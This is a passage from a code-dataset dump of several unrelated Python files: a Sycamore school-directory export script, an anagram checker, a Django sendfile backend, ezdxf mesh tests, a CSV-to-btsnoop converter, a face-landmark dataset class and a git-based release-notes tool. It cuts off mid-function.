family[\"parent2FirstName\"],\r\n '\"' + family[\"Name\"].strip() + '\"',\r\n studentLastNameIfDifferent1,\r\n studentLastNameIfDifferent2,\r\n family[\"primaryEmail\"].strip(),\r\n family[\"secondaryEmail\"].strip(),\r\n family[\"tertiaryEmail\"].strip(),\r\n getAddress(family), \r\n cityStateZip]\r\n \r\n # array of dictionary records\r\n record2 = {}\r\n record2[\"LastName\"] = classStudent[\"LastName\"]\r\n record2[\"FirstName\"] = classStudent[\"FirstName\"]\r\n record2[\"parent1LastName\"] = family[\"parent1LastName\"]\r\n record2[\"parent1FirstName\"] = family[\"parent1FirstName\"]\r\n record2[\"parent2LastName\"] = family[\"parent2LastName\"]\r\n record2[\"parent2FirstName\"] = family[\"parent2FirstName\"]\r\n record2[\"primaryEmail\"] = family[\"primaryEmail\"]\r\n record2[\"secondaryEmail\"] = family[\"secondaryEmail\"]\r\n record2[\"tertiaryEmail\"] = family[\"tertiaryEmail\"]\r\n record2[\"PrimaryTeacher\"] = aClassRecord[\"PrimaryTeacher\"]\r\n record2[\"HomeroomTeacher\"] = classStudent[\"HomeroomTeacher\"]\r\n\r\n \r\n \r\n \r\n except TypeError: \r\n logging.exception(\"Incorrect family record for code {0} and student {1} {2}\"\r\n .format(familyCode, \r\n classStudent[\"FirstName\"],\r\n classStudent[\"LastName\"]));\r\n record = [];\r\n finally:\r\n if len(record) == 0:\r\n return (\"\", {});\r\n return (\",\".join(record), record2)\r\n\r\ndef validateClassDetails(classes):\r\n for aClassRecord in classes:\r\n teacherFullName = aClassRecord[\"PrimaryTeacher\"]\r\n # Report Missing Teacher details\r\n if (not teacherFullName.strip()):\r\n logging.warning('Warning: Missing teacher name in record for class {0}'\r\n .format(aClassRecord[\"Name\"]))\r\n \r\ndef saveRecords(allRecords):\r\n for record in allRecords:\r\n print (record)\r\n\r\n\r\n# Want LastName, FirstName, Class, Room, Teacher LastName, Teacher FirstName, \r\n# FamilyId, ParentName, Primary Parent Name, VolunteerAssignment, Address, \r\n# From Classes record, get Room(Section), Class(Description),\r\n# TeacherName(PrimaryTeacher), ClassID for each ClassID\r\n\r\n# In /Family//Contacts I will get email addresses of both mother and father\r\n# Use token here.\r\ndef extractRecords(schoolId, token):\r\n try:\r\n familyDict = getFamilyDict(MAIN_URL, schoolId, token)\r\n classesDict = getClassDict(MAIN_URL, schoolId, token)\r\n \r\n allRecords=[];\r\n allRecords.append(createRecordHeader())\r\n dictRecordArray = []\r\n for aClassRecord in classesDict[\"Period\"]:\r\n # clean name of record\r\n aClassRecord[\"Name\"] = aClassRecord[\"Name\"].replace(\"\\\\\",\"\")\r\n logging.debug((\"Class Name = {}, Class Room = {}, Class ID = {}\"\r\n .format(aClassRecord[\"Name\"], aClassRecord[\"Section\"],\r\n aClassRecord[\"ID\"])))\r\n try:\r\n classDetailUrl = MAIN_URL + '/School/'+ str(schoolId) +'/Classes/' + str(aClassRecord[\"ID\"]) \r\n classDetailDict = retrieve(classDetailUrl, token)\r\n classStudentsInfoDict = dict()\r\n classInfoUrl = MAIN_URL + '/Class/' + str(aClassRecord[\"ID\"]) + '/Directory'\r\n classStudentsInfoDict = retrieve(classInfoUrl, token)\r\n logging.info('Retrieved {0} student records in class {1}'\r\n .format(str(len(classStudentsInfoDict)), aClassRecord[\"Name\"]))\r\n logging.debug(classStudentsInfoDict)\r\n \r\n \r\n \r\n # create records for all students\r\n detailedStudentInfoDict = []\r\n for classStudent in classStudentsInfoDict:\r\n studentID = classStudent[\"ID\"].strip()\r\n studentStatistcssUrl = MAIN_URL + '/Student/' + str(studentID) + '/Statistics/' + '9255'\r\n stat = retrieve(studentStatistcssUrl, token)\r\n logging.debug('Found {0} stat for student {1}.'.format(stat[\"Value\"], classStudent[\"Code\"]))\r\n \r\n studentInfoUrl = MAIN_URL + '/Student/' + str(studentID)\r\n detailedStudentInfo = retrieve(studentInfoUrl, token)\r\n detailedStudentInfoDict.append(detailedStudentInfo)\r\n \r\n for detailedStudentInfo in detailedStudentInfoDict:\r\n [r, dictRecord] = createRecord(aClassRecord, classDetailDict, detailedStudentInfo, stat[\"Value\"], familyDict);\r\n if len(r)>0:\r\n allRecords.append(r);\r\n dictRecordArray.append(dictRecord)\r\n \r\n except RestError as e:\r\n msg = \"REST API error when retrieving {0} student records \" + \\\r\n \"in class {1} with message {2}\" \\\r\n .format(str(len(classStudentsInfoDict)), aClassRecord[\"Name\"],\r\n str(e));\r\n logging.debug(msg);\r\n logging.warning('No student records available for class {0}'.format(aClassRecord[\"Name\"]));\r\n \r\n saveRecords(allRecords)\r\n except Exception as ex:\r\n msg = \"Connection failed: {0}\".format(ex);\r\n logging.exception(msg);\r\n\r\ndef parseArguments():\r\n parser = argparse.ArgumentParser(description='Extract Family and School Data')\r\n parser.add_argument('--school', dest='schoolId', action='store',\r\n type=int, required=True, help='Sycamore school ID.')\r\n parser.add_argument('--token', dest='securityToken', action='store',\r\n required=True, help='Sycamore security token.')\r\n args = parser.parse_args()\r\n return (args.schoolId, args.securityToken)\r\n\r\nif __name__ == \"__main__\" :\r\n logging.basicConfig(level=logging.INFO)\r\n args = parseArguments()\r\n extractRecords(args[0], args[1])\r\n","repo_name":"it-gssb/sycamore","sub_path":"src/extract/SycamoreExtract.py","file_name":"SycamoreExtract.py","file_ext":"py","file_size_in_byte":18681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144386873","text":"\"\"\"\nGiven two strings s1 and s2, check if they're\nanagrams. Two strings are anagrams if they're\nmade of the same characters with the same frequencies. \n\"\"\"\nfrom collections import Counter\n\n\ndef are_anagrams1(s1, s2):\n if len(s1) != len(s2):\n return False\n freq1 = {}\n freq2 = {}\n for ch in s1:\n if ch in freq1:\n freq1[ch] += 1\n else:\n freq1[ch] = 1\n for ch in s2:\n if ch in freq2:\n freq2[ch] += 1\n else:\n freq2[ch] = 1\n for key in freq1:\n if key not in freq2 or freq1[key] != freq2[key]:\n return False\n return True\n# T(n) = O(n)\n# S(n) = O(n)\n\n\ndef are_anagrams2(s1, s2):\n if len(s1) != len(s2):\n return False\n return Counter(s1) == Counter(s2)\n# T(n) = O(n)\n# S(n) = O(n)\n\n\ndef are_anagrams3(s1, s2):\n if len(s1) != len(s2):\n return False\n return sorted(s1) == sorted(s2)\n# T(n) = O(nlogn)\n# S(n) = O(n)\n\n\nstr1 = \"nameless\"\nstr2 = \"salesman\"\nr1 = are_anagrams1(str1, str2)\nr2 = are_anagrams2(str1, str2)\nprint(r1)\nprint(r2)\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"Coding Problems/Q1ValidAnagram.py","file_name":"Q1ValidAnagram.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25868655283","text":"from django.http import HttpResponse\n\nfrom django.conf import settings\nimport os.path\n\ndef _convert_file_to_url(filename):\n # CURRENTLY NOT WORKING\n # mod_wsgi wants a relative URL not a filename\n # so apache does an internal redirect\n\n relpath = os.path.relpath(filename, settings.SENDFILE_ROOT)\n \n url = [settings.SENDFILE_URL]\n\n while relpath:\n relpath, head = os.path.split(relpath)\n url.insert(1, head)\n\n return u''.join(url)\n\ndef sendfile(request, filename, **kwargs):\n response = HttpResponse()\n response['Location'] = _convert_file_to_url(filename)\n # need to destroy get_host() to stop django\n # rewriting our location to include http, so that\n # mod_wsgi is able to do the internal redirect\n request.get_host = lambda: ''\n\n return response\n\n","repo_name":"ranjithtenz/cujo","sub_path":"3rd_party_apps/sendfile/backends/mod_wsgi.py","file_name":"mod_wsgi.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70791197608","text":"import pytest\nfrom math import radians\nimport ezdxf\nfrom ezdxf.math import Vector, BoundingBox\nfrom ezdxf.render.forms import cube\nfrom ezdxf.render.mesh import MeshVertexMerger, MeshBuilder, MeshTransformer, MeshAverageVertexMerger\nfrom ezdxf.addons import SierpinskyPyramid\n\n\ndef test_vertex_merger_indices():\n merger = MeshVertexMerger()\n indices = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n indices2 = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert indices == indices2\n\n\ndef test_vertex_merger_vertices():\n merger = MeshVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.vertices == [(1, 2, 3), (4, 5, 6)]\n\n\ndef test_vertex_merger_index_of():\n merger = MeshVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.index((1, 2, 3)) == 0\n assert merger.index((4, 5, 6)) == 1\n with pytest.raises(IndexError):\n merger.index((7, 8, 9))\n\n\ndef test_average_vertex_merger_indices():\n merger = MeshAverageVertexMerger()\n indices = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n indices2 = merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert indices == indices2\n\n\ndef test_average_vertex_merger_vertices():\n merger = MeshAverageVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.vertices == [(1, 2, 3), (4, 5, 6)]\n\n\ndef test_average_vertex_merger_index_of():\n merger = MeshAverageVertexMerger()\n merger.add_vertices([(1, 2, 3), (4, 5, 6)])\n assert merger.index((1, 2, 3)) == 0\n assert merger.index((4, 5, 6)) == 1\n with pytest.raises(IndexError):\n merger.index((7, 8, 9))\n\n\ndef test_mesh_builder():\n dwg = ezdxf.new('R2000')\n pyramid = SierpinskyPyramid(level=4, sides=3)\n pyramid.render(dwg.modelspace(), merge=False)\n meshes = dwg.modelspace().query('MESH')\n assert len(meshes) == 256\n\n\ndef test_vertex_merger():\n pyramid = SierpinskyPyramid(level=4, sides=3)\n faces = pyramid.faces()\n mesh = MeshVertexMerger()\n for vertices in pyramid:\n mesh.add_mesh(vertices=vertices, faces=faces)\n assert len(mesh.vertices) == 514\n assert len(mesh.faces) == 1024\n\n\ndef test_average_vertex_merger():\n pyramid = SierpinskyPyramid(level=4, sides=3)\n faces = pyramid.faces()\n mesh = MeshAverageVertexMerger()\n for vertices in pyramid:\n mesh.add_mesh(vertices=vertices, faces=faces)\n assert len(mesh.vertices) == 514\n assert len(mesh.faces) == 1024\n\n\nREGULAR_FACE = Vector.list([(0, 0, 0), (1, 0, 1), (1, 1, 1), (0, 1, 0)])\nIRREGULAR_FACE = Vector.list([(0, 0, 0), (1, 0, 1), (1, 1, 0), (0, 1, 0)])\n\n\ndef test_has_none_planar_faces():\n mesh = MeshBuilder()\n mesh.add_face(REGULAR_FACE)\n assert mesh.has_none_planar_faces() is False\n mesh.add_face(IRREGULAR_FACE)\n assert mesh.has_none_planar_faces() is True\n\n\ndef test_scale_mesh():\n mesh = cube(center=False)\n mesh.scale(2, 3, 4)\n bbox = BoundingBox(mesh.vertices)\n assert bbox.extmin.isclose((0, 0, 0))\n assert bbox.extmax.isclose((2, 3, 4))\n\n\ndef test_rotate_x():\n mesh = cube(center=False)\n mesh.rotate_x(radians(90))\n bbox = BoundingBox(mesh.vertices)\n assert bbox.extmin.isclose((0, -1, 0))\n assert bbox.extmax.isclose((1, 0, 1))\n\n\n@pytest.fixture(scope='module')\ndef msp():\n doc = ezdxf.new()\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef cube_polyface(msp):\n p = msp.add_polyface()\n p.append_faces(cube().faces_as_vertices())\n return p\n\n\ndef test_from_empty_polyface(msp):\n empty_polyface = msp.add_polyface()\n b = MeshBuilder.from_polyface(empty_polyface)\n assert len(b.vertices) == 0\n assert len(b.faces) == 0\n\n\ndef test_from_cube_polyface(cube_polyface):\n b = MeshBuilder.from_polyface(cube_polyface)\n assert len(b.vertices) == 24 # unoptimized mesh builder\n assert len(b.faces) == 6\n\n\ndef test_render_polyface(cube_polyface):\n doc = ezdxf.new()\n msp = doc.modelspace()\n t = MeshTransformer.from_polyface(cube_polyface)\n assert len(t.vertices) == 24 # unoptimized mesh builder\n assert len(t.faces) == 6\n t.render_polyface(msp)\n new_polyface = msp[-1]\n assert new_polyface.dxftype() == 'POLYLINE'\n assert new_polyface.is_poly_face_mesh is True\n assert len(new_polyface.vertices) == 8 + 6\n assert new_polyface.vertices[0] is not cube_polyface.vertices[0]\n\n\ndef test_from_polymesh(msp):\n polymesh = msp.add_polymesh(size=(4, 4))\n b = MeshBuilder.from_polyface(polymesh)\n n = polymesh.dxf.n_count\n m = polymesh.dxf.m_count\n nfaces = (n - 1) * (m - 1)\n assert len(b.vertices) == nfaces * 4 # unoptimized mesh builder\n assert len(b.faces) == nfaces\n\n\ndef test_from_polyface_type_error(msp):\n polyline = msp.add_polyline3d([(0, 0, 0), (1, 0, 0)])\n with pytest.raises(TypeError):\n MeshBuilder.from_polyface(polyline)\n\n line = msp.add_line(start=(0, 0, 0), end=(1, 0, 0))\n with pytest.raises(TypeError):\n MeshBuilder.from_polyface(line)\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"tests/test_07_render/test_703_render_mesh.py","file_name":"test_703_render_mesh.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4095851771","text":"import csv\nimport sys\nfrom datetime import datetime\nimport struct\nimport os\n\nhelp = \"\"\"\nusage: python [csv input] [btsnoop output]\n\"\"\"\n\nclass BTSNOOP():\n \n def __init__(self):\n self.packet_records = []\n\n def __pack(self, size, val):\n pass\n\n def save_packet(self, time_stamp_us, direction_h_c, data_array):\n\n # Original Length\n Original_Length = 4 + len(data_array) + 4 + 4 + 8\n\n # Included Length\n Included_Length = len(data_array)\n\n # Packet Flags\n Packet_Flags = 0\n if direction_h_c == \"C->H\":\n Packet_Flags = 1\n \n if data_array[0] == 0x01 or data_array[0] == 0x04:\n Packet_Flags |= 1<<1\n\n # Cumulative Drops\n Cumulative_Drops = 0\n\n # Timestamp Microseconds\n byte_s = struct.pack(\">IIIIQ\", Original_Length, Included_Length, Packet_Flags, Cumulative_Drops, time_stamp_us)\n packet_record = list(byte_s)\n\n # Packet Data\n packet_record += data_array\n\n self.packet_records.append(packet_record)\n\n def save_to_file(self, file_path):\n file = open(file_path, 'wb+')\n\n # write btsnoop header\n file.write(bytes([0x62,0x74,0x73,0x6E,0x6F,0x6F,0x70,0x00])) #Identification Pattern\n file.write(bytes([0x00,0x00,0x00,0x01])) #Version Number\n file.write(bytes([0x00,0x00,0x03,0xEA])) #Datalink Type: 1002 - HCI UART (H4)\n\n # write all packet records\n for record in self.packet_records:\n file.write(bytes(record))\n\n # save\n file.close()\n\ndef get_time_stamp(iso_8601_str):\n # 2022-07-02T13:03:04.042449200+00:00\n time_str_a = iso_8601_str[:26]\n time_str_b = iso_8601_str[29:]\n\n time_str_s = time_str_a + time_str_b\n d = datetime.strptime(time_str_s, \"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n time_stamp_us = int(d.timestamp() * 1000 * 1000) + 0x00dcddb30f2f8000 # add 1970 years with us unit.\n\n return time_stamp_us\n \n\nif __name__ == \"__main__\":\n # get args\n args = sys.argv[1:]\n\n if len(args) == 1:\n input_csv_path = args[0]\n output_btsnoop_path = input_csv_path[:-4] + '.log'\n elif len(args) == 2:\n input_csv_path = args[0]\n output_btsnoop_path = args[1]\n else:\n print(help)\n sys.exit()\n\n if not os.path.exists(input_csv_path):\n print(\"input path not exist!\")\n sys.exit()\n \n if os.path.exists(output_btsnoop_path):\n print(\"input path already exist!\")\n sys.exit()\n\n input_csv = open(input_csv_path, 'r')\n\n csv = csv.DictReader(input_csv)\n\n btsnoop = BTSNOOP()\n\n for row in csv:\n # time stamp\n time_stemp_us = get_time_stamp(row['start_time'])\n\n # data directions\n direction_h_c = row['data'][:4]\n if row['data'][:4] == \"H->C\":\n pass\n elif row['data'][:4] == \"C->H\":\n pass\n else:\n raise \"Data not 'H->C' or 'C->H'!\"\n sys.exit()\n \n # data\n data_str = row['data'][5:].split(' ')\n data_array = [int(x, 16) for x in data_str]\n\n btsnoop.save_packet(time_stemp_us, direction_h_c, data_array)\n\n btsnoop.save_to_file(output_btsnoop_path)\n\n\n\n","repo_name":"AnChangNice/Logic2_HCI_UART_Extension","sub_path":"csv2btsnoop.py","file_name":"csv2btsnoop.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30623935099","text":"from torch.utils.data import Dataset\nfrom PIL import Image\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nimport torchvision.transforms.functional as TF\nimport random\nimport torch\n\nclass FaceDataset(Dataset):\n def __init__(self, prefix, transform, coordinate_transform=None, do_train=True) -> None:\n super().__init__()\n self.prefix = prefix\n self.transform = transform\n self.coordinate_transform = coordinate_transform\n self.landmarks = None\n if do_train:\n with open(os.path.join(self.prefix, 'annot.pkl'), 'rb') as f:\n self.imgs, self.landmarks = pickle.load(f)\n self.landmarks = np.array(self.landmarks)\n else:\n self.imgs = os.listdir(self.prefix)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, index):\n img = self.transform(Image.open(os.path.join(self.prefix, self.imgs[index])).convert(\"RGB\"))\n C, H, W = img.shape\n if self.landmarks is not None:\n norm_landmarks = np.stack((self.landmarks[index, :, 0] / W, self.landmarks[index, :, 1] / H), axis=1)\n if self.coordinate_transform is not None:\n return self.coordinate_transform((img, norm_landmarks))\n else:\n return img, norm_landmarks\n else:\n return self.imgs[index], img\n\ndef show_landmarks(image, landmarks, img_name='./landmarks.png'):\n C, H, W = image.shape\n plt.figure()\n plt.imshow(image.permute(1, 2, 0))\n plt.scatter(landmarks[:, 0] * W, landmarks[:, 1] * H, s=10, marker='.', c='r')\n plt.savefig(img_name)\n\nclass RandomFlip(object): \n def __init__(self, probability=0.5):\n assert 0 <= probability <= 1\n self.prob = probability \n\n def __call__(self, sample):\n image, landmarks = sample\n if self.prob > random.random():\n lm = landmarks.copy()\n lm[:, 0] = 1 - lm[:, 0]\n return TF.hflip(image), lm\n else:\n return image, landmarks\n\nclass RandomRotate(object): \n def __init__(self, degree=0):\n assert degree >= 0\n self.degree = degree\n\n def __call__(self, sample):\n image, landmarks = sample\n c, h, w = image.shape\n deg = random.uniform(-self.degree, self.degree)\n rad = np.deg2rad(deg)\n rotation_matrix = np.array([\n [np.cos(rad), -np.sin(rad)],\n [np.sin(rad), np.cos(rad)]\n ])\n trans_cor = ((landmarks - 0.5) @ rotation_matrix.T) + 0.5\n if np.any(trans_cor < 0) or np.any(trans_cor > 1):\n return image, landmarks\n else:\n return TF.rotate(image, -deg), trans_cor\n\nclass RandomMask(object): \n def __init__(self, ratio=0):\n assert 0 <= ratio <= 1\n self.ratio = ratio\n\n def __call__(self, image):\n c, h, w = image.shape\n mask_left = random.randrange(w - 1)\n mask_top = random.randrange(h - 1)\n mask_h = int(random.uniform(0, self.ratio) * h)\n mask_w = int(random.uniform(0, self.ratio) * w)\n if mask_h == 0 or mask_w == 0:\n return image\n mask_right = min(w - 1, mask_left + mask_w)\n mask_bottom = min(h - 1, mask_top + mask_h)\n img = image.clone()\n img[:, mask_top:mask_bottom, mask_left:mask_right] = torch.zeros(c, mask_bottom - mask_top, mask_right - mask_left)\n return img\n \n\nif __name__ == \"__main__\":\n from torchvision import transforms\n faces = FaceDataset(\"./data/aflw_val/\", transforms.Compose([\n transforms.ColorJitter(0.2, 0.2, 0.2),\n transforms.GaussianBlur(3),\n transforms.ToTensor(), \n RandomMask(0.2)\n ]), transforms.Compose([\n RandomFlip(), \n RandomRotate(15)\n ]))\n for i in range(10):\n img, lm = faces[50+i]\n show_landmarks(img, lm, f\"./tmp/{i}.png\")","repo_name":"zqyuan-tw/Light_Weight_Facial_Landmark_Prediction","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13988724933","text":"\"\"\"Release notes runner class\"\"\"\nimport os\nimport os.path\nimport re\nimport shutil\nimport subprocess\nimport logging\nimport sys\nimport time\nfrom collections import defaultdict\nfrom datetime import datetime\n\nimport yaml.representer\n\nyaml.add_representer(defaultdict, yaml.representer.Representer.represent_dict)\n\n\nclass Msg:\n \"\"\"Collection of configurable user facing message ids.\"\"\"\n\n NEED_NOTE = \"need-note\"\n NEED_TARGET = \"need-target\"\n\n\nDEFAULT_CONFIG = {\n \"encoding\": \"utf8\",\n \"earliest_version\": \"0.0.1\",\n \"notes_dir\": \"./releasenotes\",\n \"release_tag_re\": r\"^v?((?:[\\d.ab]|rc)+)\",\n \"sections\": [\n [\"features\", \"New Features\"],\n [\"internal\", \"Internal Changes\"],\n ],\n \"messages\": {\n Msg.NEED_NOTE: \"Please create a release note for this branch.\",\n Msg.NEED_TARGET: \"No upstream configured or detected, use --target .\",\n },\n \"prelude_section_name\": \"release_summary\",\n \"template\": \"# Release notes template.\\n\"\n \"release_summary: >\\n\"\n \" Replace this text with content to appear at the\\n\"\n \" top of the section for this release.\\n\"\n \"features:\\n\"\n \" - List new features here, or remove this section.\\n\",\n}\n\nlog = logging.getLogger(\"rnotes\")\n\n\nCONFIG_PATH = \"./rnotes.yaml\"\n\n\ndef normalize(git_dir):\n \"\"\"Normalize to forward slash, strip off ./ from the front.\"\"\"\n return git_dir.replace(\"\\\\\", \"/\").replace(\"./\", \"\")\n\n\nclass Runner: # pylint: disable=too-many-instance-attributes\n \"\"\"Process rnotes command line args.\"\"\"\n\n def __init__(self, args):\n self.args = args\n try:\n with open(CONFIG_PATH, encoding=\"utf8\") as fh:\n self.cfg = yaml.safe_load(fh)\n except FileNotFoundError:\n self.cfg = DEFAULT_CONFIG.copy()\n\n self.prelude_name = self.cfg.get(\"prelude_section_name\", \"release_summary\")\n self.earliest = self.cfg.get(\"earliest_version\")\n self.version_regex = (\n args.version_regex\n or self.cfg.get(\"release_tag_re\")\n or DEFAULT_CONFIG.get(\"release_tag_re\")\n )\n self.tags = []\n self.logs = []\n self.notes = {}\n self.report = \"\"\n self.ver_start = self.args.previous\n self.ver_end = self.args.version or \"HEAD\"\n notes_dir = self.args.notes_dir or self.cfg.get(\n \"notes_dir\", DEFAULT_CONFIG.get(\"notes_dir\")\n )\n self.notes_dir = normalize(notes_dir)\n\n log.debug(\"notes_dir: %s\", self.notes_dir)\n if not os.path.exists(self.notes_dir):\n raise FileNotFoundError(\"expected folder: %s\" % self.notes_dir)\n\n self.sections = dict(self.cfg.get(\"sections\", {}))\n self.valid_sections = {self.prelude_name, *self.sections.keys()}\n\n self.__git = shutil.which(\"git\")\n\n def git(self, *args):\n \"\"\"Shell git with args.\"\"\"\n log.debug(\"+ git %s\", \" \".join(args))\n cmd = [self.__git] + list(args)\n ret = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, encoding=\"utf8\")\n return ret.stdout\n\n def get_tags(self):\n \"\"\"Get release tags, reverse sorted.\"\"\"\n self.tags = []\n\n for tag in self.git(\"log\", self.ver_end, \"--tags\", \"--pretty=%D\").split(\"\\n\"):\n tag = tag.strip()\n if not tag:\n continue\n head = re.match(r\"HEAD[^,]*, tag:\", tag)\n tag = re.search(r\"\\btag: ([^\\s,]+)\", tag)\n if not tag:\n continue\n tag = tag[1]\n if re.match(self.version_regex, tag):\n self.tags.append(tag)\n if head:\n self.ver_end = tag\n if tag == self.earliest:\n break\n\n self.tags = list(reversed(self.tags))\n\n log.debug(\"tags: %s\", self.tags)\n\n def get_start_from_end(self):\n \"\"\"If start not specified, assume previous release.\"\"\"\n if not self.ver_start:\n if self.ver_end == \"HEAD\":\n self.ver_start = self.tags[-1] if self.tags else \"HEAD\"\n\n prev = None\n for t in self.tags:\n if self.ver_end == t:\n self.ver_start = prev\n prev = t\n\n log.debug(\"prev: %s, cur: %s\", self.ver_start, self.ver_end)\n\n def get_logs(self):\n \"\"\"Get a list of logs with tag, hash and ct.\"\"\"\n cur_tag = self.ver_end\n ct = 0\n cname = \"\"\n hsh = \"\"\n if self.ver_start == \"TAIL\" or not self.ver_start:\n vers = self.ver_end\n else:\n vers = self.ver_start + \"..\" + self.ver_end\n for ent in self.git(\n \"log\", vers, \"--name-only\", \"--format=%D^%ct^%cn^%h\", \"--diff-filter=A\"\n ).split(\"\\n\"):\n ent = ent.strip()\n info = ent.split(\"^\")\n if len(info) > 1:\n tag, ct, cname, hsh = info\n tag = re.search(r\"\\btag: ([\\S,]+)\", tag)\n if tag:\n cur_tag = tag[1]\n if ent.startswith(self.notes_dir):\n self.logs.append((cur_tag, ct, cname, hsh, ent))\n\n def load_note(self, tag, file, ct, cname, hsh, notes):\n \"\"\"Load specified note into notes list.\"\"\"\n try:\n log.debug(\"load note: %s, %s\", tag, file)\n with open(file, encoding=\"utf8\") as f:\n note = yaml.safe_load(f)\n for k, v in note.items():\n assert k in self.valid_sections, \"%s: %s is not a valid section\" % (\n file,\n k,\n )\n if type(v) is str:\n v = [v]\n assert (\n type(v) is list\n ), \"%s: '%s' : list of entries or single string\" % (file, k)\n for line in v:\n assert (\n type(line) is str\n ), \"%s: '%s' : must be a simple string\" % (file, line)\n line = {\n \"time\": int(ct),\n \"name\": cname,\n \"hash\": hsh,\n \"note\": line,\n }\n notes[tag][k].append(line)\n except FileNotFoundError:\n log.debug(\"ignoring missing file %s\", file)\n except Exception as e:\n print(\"Error reading file %s: %s\" % (file, repr(e)))\n raise\n\n def get_notes(self):\n \"\"\"Fill self.notes with a structured list of notes.\"\"\"\n seen = {}\n notes = defaultdict(lambda: defaultdict(lambda: []))\n for tag, ct, cname, hsh, file in self.logs:\n if seen.get(file): # pragma: no cover\n # defensive, can happen with weird logs, hard to set up\n continue\n seen[file] = True\n try:\n self.load_note(tag, file, ct, cname, hsh, notes)\n except FileNotFoundError:\n pass\n\n cname = self.git(\"config\", \"user.name\").strip()\n\n for file in self.git(\"diff\", \"--name-only\", \"--cached\").split(\"\\n\"):\n path = normalize(file.strip())\n self._load_uncommitted(seen, notes, path, cname)\n\n for porc in self.git(\"status\", \"--porcelain\").split(\"\\n\"):\n path = normalize(porc[3:].strip())\n self._load_uncommitted(seen, notes, path, cname)\n\n if self.args.lint:\n # every file, not just diffs\n for file in os.listdir(self.notes_dir):\n path = normalize(os.path.join(self.notes_dir, file))\n self._load_uncommitted(seen, notes, path, cname)\n\n self.notes = notes\n\n def _load_uncommitted(self, seen, notes, path, cname):\n if seen.get(path):\n return\n if not os.path.isfile(path):\n return\n if not path.endswith(\".yaml\"):\n return\n if not path.startswith(self.notes_dir):\n return\n seen[path] = True\n self.load_note(\"Uncommitted\", path, os.stat(path).st_mtime, cname, None, notes)\n\n def get_report(self):\n \"\"\"Turn self.notes into a markdown report.\"\"\"\n num = 0\n for tag, sections in self.notes.items():\n if tag == \"HEAD\":\n tag = \"Current Branch\"\n if num > 0:\n print(\"\")\n num += 1\n print(tag)\n print(\"=\" * len(tag))\n\n ents = sections.get(self.prelude_name, {})\n for ent in sorted(ents, key=lambda ent: ent[\"time\"], reverse=True):\n note = ent[\"note\"].strip()\n print(note, \"\\n\")\n\n for sec, title in self.sections.items():\n ents = sections.get(sec, {})\n if not ents:\n continue\n print()\n print(title)\n print(\"-\" * len(title))\n for ent in sorted(ents, key=lambda ent: ent[\"time\"], reverse=True):\n note = ent[\"note\"]\n if self.args.blame:\n epoch = ent[\"time\"]\n name = ent[\"name\"]\n hsh = ent[\"hash\"]\n hsh = \"`\" + hsh + \"`\" if hsh else \"\"\n print(\n \"-\",\n note,\n hsh,\n \"(\" + name + \")\",\n time.strftime(\"%y-%m-%d\", time.localtime(epoch)),\n )\n else:\n print(\"-\", note)\n\n def get_branch(self):\n \"\"\"Get current branch name.\"\"\"\n return self.git(\"rev-parse\", \"--abbrev-ref\", \"HEAD\").strip()\n\n def switch_branch(self, branch):\n \"\"\"Switch current branch.\"\"\"\n self.git(\"-c\", \"advice.detachedHead=false\", \"checkout\", branch)\n\n def create_new(self):\n \"\"\"Create a new note with an editor and prompt for git add.\"\"\"\n ymd = datetime.today().strftime(\"%Y-%m-%d\")\n name = ymd + \"-\" + os.urandom(8).hex() + \".yaml\"\n fp = os.path.join(self.notes_dir, name)\n with open(fp, \"w\", encoding=\"utf8\") as fh:\n fh.write(self.cfg.get(\"template\"))\n\n # get editor\n editor = self.cfg.get(\n \"editor.\" + sys.platform, self.cfg.get(\"editor\", os.environ.get(\"VISUAL\"))\n )\n\n if not editor: # pragma: no cover\n if sys.platform == \"win32\":\n editor = \"notepad.exe\"\n else:\n editor = \"vi\"\n\n exe = shutil.which(editor)\n if exe:\n cmd = [exe, fp]\n subprocess.run(cmd, check=True)\n else: # pragma: no cover\n # happens in the windows tests, since they use a cmd builtin\n subprocess.run(editor + ' \"' + fp + '\"', check=True, shell=True)\n\n self.lint_file(fp)\n\n answer = input(\"Add to git [y|n]: \")\n if answer[0].lower() == \"y\":\n self.git(\"add\", fp)\n\n print(\"Created:\", normalize(fp))\n\n def lint_file(self, fp):\n \"\"\"Lint a single file.\"\"\"\n seen = {}\n notes = defaultdict(lambda: defaultdict(lambda: []))\n cname = self.git(\"config\", \"user.name\").strip()\n\n self._load_uncommitted(seen, notes, fp, cname)\n\n def run(self):\n \"\"\"Run the program, with current args.\"\"\"\n orig = None\n if self.args.create:\n self.create_new()\n return\n\n if self.args.check:\n self.branch_check()\n return\n\n if self.ver_end != \"HEAD\":\n orig = self.get_branch()\n self.switch_branch(self.ver_end)\n try:\n self.get_tags()\n 